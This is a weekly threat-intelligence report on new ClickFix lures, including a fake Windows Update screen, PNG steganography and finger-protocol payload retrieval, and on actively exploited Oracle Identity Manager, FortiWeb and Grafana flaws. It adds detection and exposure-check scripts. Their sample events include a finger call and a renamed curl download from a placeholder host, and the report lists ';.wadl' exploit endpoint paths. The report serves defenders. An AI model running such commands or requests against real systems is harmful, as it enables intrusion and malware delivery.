This week, we briefed our clients on new lures being used by the “Most Common Attack Method in 2025” (observed in 47% of all attacks): ClickFix.
KEY TAKEAWAYS
- New ClickFix campaigns are using new lures and payload delivery methods. Learn how to protect your organization.
- Critical and high severity vulnerabilities in Oracle, Fortinet, and Grafana, plus updates to CISA KEV. Patch now!
New ClickFix Tricks
The social engineering technique known as ClickFix has rapidly become the most common initial access method for threat actors in 2025. According to Microsoft's "Digital Defense Report 2025", ClickFix was observed in 47% of attacks, surpassing phishing as the #1 method. As the ClickFix method approaches a year of mainstream exploitation, threat actors are expanding upon the concept and inventing even more creative ways to entice unsuspecting users to run malicious commands. Additionally, threat actors are using more creative methods to download and execute malicious payloads after the user runs the commands.
New Lure - Windows Update Screen
Recent reports from Huntress and Acronis have highlighted a new variant of ClickFix that leverages an additional technique called screen hijacking, where the ClickFix lure is merged with a fake Windows Update screen. Using this technique, the lure takes over the full screen, showing the well-known blue background used in Windows updates, tricking the user into running the malicious command in order to “complete” the Windows update.

Fig. 1: ClickFix Fake Windows Update Using Screen Hijacking | Source: Acronis
Per the Acronis blog, the threat actors that are using this screen hijacking technique are deploying it across a variety of fake adult websites, which adds to the psychological pressure to complete the "update".
ClickFix Steganography
Researchers at Huntress identified a ClickFix campaign leveraging heavy obfuscation, encryption, and steganography to facilitate loading malicious code into memory. The threat actors embed the malicious code directly within the pixel data of PNG images, and separate PowerShell and .NET assembly scripts extract the payload from the image. The final result is the deployment of the LummaC2 and Rhadamanthys information stealers. This campaign also leveraged the fake Windows Update prompt.

Fig 2: ClickFix + Steganography Attack Cycle | Source: Huntress
Finger Protocol
Several recent ClickFix campaigns have begun to use a decades-old protocol known as finger. Historically, this protocol was used to look up information about local and remote computers on Unix and Linux systems, and the command was eventually added to Windows systems. In normal scenarios, running the command returns basic information about a user, including their login name, home directory, phone numbers, last seen time, and more. The ClickFix campaigns are using finger in the initial copy/paste command to retrieve additional payloads. In one instance documented on /r/MalwareAnalysis on Reddit, the finger command retrieves additional commands that create a randomly named file path, copy curl.exe to a randomly named file, and use that executable to download a ZIP archive disguised as a PDF file. A Python malware package is then extracted from the ZIP archive.
How to Protect Your Organization
- As with all ClickFix attacks, user awareness training is crucial. At the end of the day, regardless of the complexity and sophistication of the commands run and the malware executed, this is a social engineering attack that relies on the user running the initial command themselves. Ensure users are aware of the different methods threat actors are leveraging to trick users in these attacks.
- Ensure fully up-to-date EDR solutions are deployed across all endpoints.
- Use a web gateway or firewall policy to block web traffic based on content. Adult sites, gambling, gaming, streaming, and other site content categories that have no business use case can be blocked. This single action can prevent a large number of malware infections.
- Block the finger protocol at the firewall. This protocol has no modern use case and should not be allowed through the firewall. Only ports and protocols that are absolutely necessary to the function of the business should be allowed.
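As an added illustration of the detection side of the finger-based chain described above, and of the EDR recommendation in this list, the following Python script (written for this report, not code from any of the cited sources) scans process-creation events for the three behaviours the Reddit write-up describes: the finger client being launched, curl.exe being copied to a new name, and that renamed copy executing. The sample events are constructed; field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage, OriginalFileName), and the address 198.51.100.20 and the file name xq7t1.exe are placeholders.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events using Sysmon Event ID 1 field names.
# These records are made up for the example; they are not data from the
# campaign described in the report. 198.51.100.20 is a documentation
# address (TEST-NET-2), and the random-looking file name is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": "finger user@198.51.100.20",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "finger.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c copy C:\Windows\System32\curl.exe C:\Users\Public\xq7t1.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "Cmd.Exe"},
    {"Image": r"C:\Users\Public\xq7t1.exe",
     "CommandLine": r"xq7t1.exe -o C:\Users\Public\invoice.pdf http://198.51.100.20/a.pdf",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "curl.exe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -s https://updates.example.com/health",
     "ParentImage": r"C:\Program Files\Acme\agent.exe",
     "OriginalFileName": "curl.exe"},
]

# "copy [switches] <source ending in curl.exe> <destination>" as typed into cmd.exe.
COPY_RE = re.compile(
    r'\bcopy\b\s+(?:/\S+\s+)*"?(?P<src>[^\s"]*curl\.exe)"?\s+"?(?P<dst>[^\s"]+)"?',
    re.IGNORECASE,
)


def basename(path):
    """Lower-cased final component of a Windows path (or a bare file name)."""
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Return the list of suspicious behaviours an event matches (empty if none)."""
    findings = []
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    original = event.get("OriginalFileName", "").lower()

    # 1. The finger client itself has no business use on modern endpoints.
    if image == "finger.exe":
        findings.append("finger_client_executed")

    # 2. curl.exe copied to a file that is not called curl.exe.
    match = COPY_RE.search(cmdline)
    if match and basename(match.group("dst")) != "curl.exe":
        findings.append("curl_copied_to_new_name")

    # 3. A binary whose PE metadata says curl.exe, running under another name.
    if original == "curl.exe" and image != "curl.exe":
        findings.append("renamed_curl_executed")

    return findings


def scan(events):
    """Map event index -> findings for every event that matched something."""
    return {i: f for i, f in ((i, classify(e)) for i, e in enumerate(events)) if f}


def looks_like_clickfix_chain(events):
    """True when at least two distinct stages of the chain appear together."""
    stages = {finding for findings in scan(events).values() for finding in findings}
    return len(stages) >= 2


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["Image"], findings)
    print("chain suspected:", looks_like_clickfix_chain(SAMPLE_EVENTS))
```

The OriginalFileName comparison is the most robust of the three checks, because a renamed copy of curl.exe keeps its PE version resource even when the file name is random; the plain finger.exe rule is low-noise on hosts where nobody legitimately runs the client.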
Resources:
- https://www.huntress.com/blog/clickfix-malware-buried-in-images
- https://www.acronis.com/en/tru/posts/fake-adult-websites-pop-realistic-windows-update-screen-to-deliver-stealers-via-clickfix/
- https://www.bleepingcomputer.com/news/security/clickfix-attack-uses-fake-windows-update-screen-to-push-malware/
- https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/
- https://www.reddit.com/r/MalwareAnalysis/comments/1osuo87/i_just_fell_for_verify_you_are_human_win_r_what/
- https://www.intel471.com/blog/clickfix-tricking-users-into-installing-infostealers
- https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf#page=1
Vulnerability Roundup
Oracle Identity Manager 0-Day
CISA has warned of a remote code execution (RCE) vulnerability in Oracle Identity Manager that is being actively exploited in the wild. Tracked as CVE-2025-61757, the vulnerability is a pre-authentication (authentication bypass) RCE in the product's REST API, allowing attackers to remotely exploit the flaw without the need for valid credentials. The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0. The patch was issued in Oracle's October 2025 Security Updates, which was released on October 21. Administrators are urged to patch as soon as possible if they have not done so already. According to Johannes Ullrich, Dean of Research for SANS Technology Institute, early exploitation attempts of this vulnerability targeted the following endpoints (notice the ;.wadl appended to the end):
/iam/governance/applicationmanagement/templates;.wadl
/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl
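For defenders who want to look back through web-server logs for requests shaped like the ones above, here is an added Python example (written for this report, not code from Oracle or the SANS diary) that parses combined-format access-log lines, strips any `;parameter` suffix from each path segment, and flags requests to `/iam/governance/` endpoints whose raw path carried such a suffix. The log lines are constructed for the example; 203.0.113.7 and 198.51.100.4 are documentation addresses and `/static/css/site.css` is a placeholder path.

```python
import re
from urllib.parse import urlsplit

# Constructed web-server access-log lines in the common "combined" format.
# They are made up for this example and are not traffic from a real incident;
# 203.0.113.7 and 198.51.100.4 are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Nov/2025:10:01:02 +0000] "GET /iam/governance/applicationmanagement/templates;.wadl HTTP/1.1" 200 512 "-" "curl/8.0.1"
203.0.113.7 - - [12/Nov/2025:10:01:05 +0000] "POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl HTTP/1.1" 200 88 "-" "python-requests/2.31.0"
198.51.100.4 - - [12/Nov/2025:10:02:00 +0000] "GET /iam/governance/applicationmanagement/templates HTTP/1.1" 401 0 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Nov/2025:10:02:01 +0000] "GET /static/css/site.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def normalize_path(target):
    """Drop the query string and any ';param' segment parameters so that paths
    can be compared regardless of what was appended to a segment."""
    path = urlsplit(target).path
    return "/".join(segment.split(";", 1)[0] for segment in path.split("/"))


def flag_segment_parameter_requests(log_text, prefix="/iam/governance/"):
    """Return requests whose normalized path is under `prefix` but whose raw
    path carried a ';' segment parameter, such as the ';.wadl' suffix seen in
    the early exploitation attempts."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        raw_path = urlsplit(rec["target"]).path
        norm_path = normalize_path(rec["target"])
        if norm_path.startswith(prefix) and ";" in raw_path:
            hits.append({
                "ip": rec["ip"],
                "method": rec["method"],
                "raw_path": raw_path,
                "normalized_path": norm_path,
                "status": int(rec["status"]),
            })
    return hits


if __name__ == "__main__":
    for hit in flag_segment_parameter_requests(SAMPLE_LOG):
        print(hit)
```

Normalizing before comparing matters because a rule that only matches the literal endpoint string would miss the `;.wadl` variant, while a rule that only matches `;.wadl` would miss other segment parameters; the status code is kept in the output so that a 200 on these requests can be prioritized over a 401.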
- https://slcyber.io/research-center/breaking-oracles-identity-manager-pre-auth-rce/
- https://isc.sans.edu/diary/Oracle+Identity+Manager+Exploit+Observation+from+September+CVE202561757/32506/
- https://www.oracle.com/security-alerts/cpuoct2025.html
- https://www.bleepingcomputer.com/news/security/cisa-warns-oracle-identity-manager-rce-flaw-is-being-actively-exploited/
- https://nvd.nist.gov/vuln/detail/CVE-2025-61757
Yet Another Fortinet 0-Day
Fortinet recently released security updates for another 0-day flaw in their FortiWeb product. Tracked as CVE-2025-58034, the flaw is an OS Command Injection vulnerability that is low complexity and does not require user interaction. Per the FortiGuard advisory for the vulnerability, successful exploitation allows for an attacker to "execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands." The following table shows affected versions and their corresponding fixed versions:

- https://fortiguard.fortinet.com/psirt/FG-IR-25-513
- https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-fortiweb-zero-day-exploited-in-attacks/
Maximum Severity Flaw in Grafana
Grafana, an open-source data analytics and monitoring tool, recently disclosed a maximum severity vulnerability in Grafana Enterprise. The vulnerability, tracked as CVE-2025-41115, affects the SCIM (System for Cross-domain Identity Management) component of Grafana Enterprise. Successful exploitation allows an attacker to elevate privileges or impersonate another user. Affected versions are Grafana Enterprise 12.0.0 to 12.2.1. In order to be vulnerable, the following conditions must be met:
- The enableSCIM feature flag is set to true
- The user_sync_enabled config option in the [auth.scim] block is set to true
The vulnerability has been fixed in the following versions:
- Grafana Enterprise 12.0.6+security-01
- Grafana Enterprise 12.1.3+security-01
- Grafana Enterprise 12.2.1+security-01
- Grafana Enterprise 12.3.0
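Because exposure depends on both the running version and two configuration settings, the following added Python example (written for this report, not code from Grafana Labs) turns the conditions listed above into a check an administrator can run against a grafana.ini and a version string. The grafana.ini fragments are constructed; the example assumes the feature flag is expressed in the `[feature_toggles]` section either as `enableSCIM = true` or as an entry in a comma-separated `enable = ...` list, and `someOtherToggle` is a placeholder name.

```python
import configparser
import re

# Constructed grafana.ini fragments (made up for this example). The feature
# flag is assumed to live in [feature_toggles], either as "enableSCIM = true"
# or inside the comma-separated "enable = ..." list; someOtherToggle is a placeholder.
INI_SCIM_SYNC_ON = """
[feature_toggles]
enable = someOtherToggle, enableSCIM

[auth.scim]
user_sync_enabled = true
"""

INI_SCIM_SYNC_OFF = """
[feature_toggles]
enableSCIM = true

[auth.scim]
user_sync_enabled = false
"""

# Version facts as stated in the advisory summary above.
AFFECTED_MIN = (12, 0, 0)
AFFECTED_MAX = (12, 2, 1)
FIXED_VERSIONS = {
    "12.0.6+security-01",
    "12.1.3+security-01",
    "12.2.1+security-01",
    "12.3.0",
}


def parse_version(version):
    """Turn '12.2.1+security-01' into (12, 2, 1); the '+...' build tag is ignored here."""
    base = version.partition("+")[0]
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", base)
    if not m:
        raise ValueError(f"unrecognised Grafana version string: {version!r}")
    return tuple(int(part) for part in m.groups())


def version_affected(version):
    """True when the version is in the affected range and is not one of the
    listed fixed builds. An unlisted build tag on an in-range base version is
    treated as affected, which errs on the side of caution."""
    if version in FIXED_VERSIONS:
        return False
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def load_ini(ini_text):
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep the case of keys such as enableSCIM
    cp.read_string(ini_text)
    return cp


def scim_feature_flag_enabled(cp):
    """Accept either spelling of the toggle (assumption, see lead-in)."""
    if cp.getboolean("feature_toggles", "enableSCIM", fallback=False):
        return True
    enabled = cp.get("feature_toggles", "enable", fallback="")
    return "enableSCIM" in {item.strip() for item in enabled.split(",")}


def scim_user_sync_enabled(cp):
    return cp.getboolean("auth.scim", "user_sync_enabled", fallback=False)


def assess(version, ini_text):
    """Combine the version check with both configuration preconditions."""
    cp = load_ini(ini_text)
    result = {
        "version_affected": version_affected(version),
        "enableSCIM": scim_feature_flag_enabled(cp),
        "user_sync_enabled": scim_user_sync_enabled(cp),
    }
    result["exposed"] = all(result.values())
    return result


if __name__ == "__main__":
    print(assess("12.1.0", INI_SCIM_SYNC_ON))
    print(assess("12.2.1+security-01", INI_SCIM_SYNC_ON))
```

The version check deliberately refuses to treat an unknown `+` build tag as a fix: only the four builds named in the advisory are exempted, so a deployment reporting an unexpected tag on an in-range version still shows as affected until someone confirms it.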
- https://grafana.com/blog/2025/11/19/grafana-enterprise-security-update-critical-severity-security-fix-for-cve-2025-41115/
- https://thehackernews.com/2025/11/grafana-patches-cvss-100-scim-flaw.html
CISA KEV Additions
The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last 2 weeks:
- CVE-2021-26829 - OpenPLC ScadaBR Cross-site Scripting Vulnerability
- CVE-2025-61757 - Oracle Fusion Middleware Missing Authentication for Critical Function Vulnerability
- CVE-2025-13223 - Google Chromium V8 Type Confusion Vulnerability
- CVE-2025-58034 - Fortinet FortiWeb OS Command Injection Vulnerability
This report is provided FREE to the cybersecurity community.
Visit our Cyber Threat Intelligence Blog for additional reports.
NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.
DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.
The PacketWatch Intelligence Team